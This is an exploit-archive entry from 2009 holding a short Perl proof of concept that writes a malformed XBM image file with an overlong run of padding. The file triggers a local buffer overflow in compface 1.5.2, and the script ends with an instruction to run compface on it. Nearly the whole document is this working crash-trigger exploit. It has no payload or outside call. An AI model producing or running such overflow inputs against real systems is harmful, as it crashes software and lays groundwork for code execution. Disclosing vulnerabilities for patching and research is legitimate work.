id: 6890
date: 06/16/2009
title: compface <= 1.5.2 (XBM File) Local Buffer Overflow PoC
author: metalhoney
cves: 

======================================================
compface <= 1.5.2 (XBM File) Local Buffer Overflow PoC
======================================================



#!/usr/bin/perl
#########################################################################
#########################################################################
# compface <= 1.5.2 bufer overflow p o c
# vuln only excist on debian and ubuntu? - packages.debian.org/compface -
# author: metalhoney ------- metalhoney1@hotmail.com -------
#########################################################################
open(ISLAM,">allah.xbm") or die;
print ISLAM "#define noname_width 48\n#define noname_height 48\n";
print ISLAM "static ";
print ISLAM "A"x184;
print ISLAM " char = {\n";
close(ISLAM) or die;
print "run now: compface allah.xbm\nmetalhoney signing off\nviva islam\n";
#########################################################################
#########################################################################



#  0day.today [2023-03-21]  #